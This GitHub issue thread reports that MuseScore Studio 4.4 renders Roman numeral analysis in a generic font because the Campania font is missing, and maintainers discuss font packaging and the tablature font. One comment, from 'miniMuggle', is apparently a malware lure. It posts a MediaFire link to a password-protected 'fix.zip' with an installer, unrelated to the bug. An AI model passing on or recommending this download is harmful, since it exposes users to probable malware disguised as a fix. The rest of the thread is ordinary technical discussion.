### ISSUE TITLE
Roman Numeral Analysis not rendering (missing font)

### ISSUE THREAD

**Issue by MarcSabatella** [musescore/MuseScore#24237]
### Issue type

Engraving bug (incorrect score rendering)

### Description with steps to reproduce

1. new score
2. select first measure rest
3. Add / Text / Roman numeral analysis
4. Type "viio65"

Result: text is rendered using some generic font, not Campania, and thus you don't get the actual RNA formatting.  If I check Properties, I see Campania is missing from the available fonts.  Installing it manually seems to work, so I assume it's a packaging issue.  Confirmed on both Windows 11 and Linux (Debian 12).

### Supporting files, videos and screenshots

![image](https://github.com/user-attachments/assets/3c892a9c-7485-4cfb-991c-909242a18f2b)

### What is the latest version of MuseScore Studio where this issue is present?

OS: Debian GNU/Linux 12 (bookworm), Arch.: x86_64, MuseScore Studio version (64-bit): 4.4.0-242390800, revision: github-musescore-musescore-0fcd11b

### Regression

Yes, this used to work in a previous version of MuseScore 4.x

### Operating system

Debian 12, Windows 11

### Checklist

- [X] This report follows the [guidelines](https://github.com/musescore/MuseScore/wiki/Reporting-bugs-and-issues) for reporting bugs and issues
- [X] I have verified that this issue has not been logged before, by searching the [issue tracker](https://github.com/musescore/MuseScore/issues) for similar issues
- [X] I have attached all requested files and information to this report
- [X] I have attempted to identify the root problem as concisely as possible, and have used minimal reproducible examples where possible

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by cbjeukendrup** [comment]
Related to this, I discovered that MScoreTab is still packaged but never referenced in the code. @MarcSabatella do you happen to know the history of this font? Where was/is it (supposed to be) used? And should we bring back the reference to it (as in, register it to the font database etc.)?

**Comment by cbjeukendrup** [comment]
Never mind, I already found it: it's referenced via `fonts_tablature.xml` (I had messed up my search settings so didn't find it initially)

**Comment by cbjeukendrup** [comment]
So the linked PR also fixes the "Renaissance" tablature font (accessible via staff/part properties > advanced style properties…)
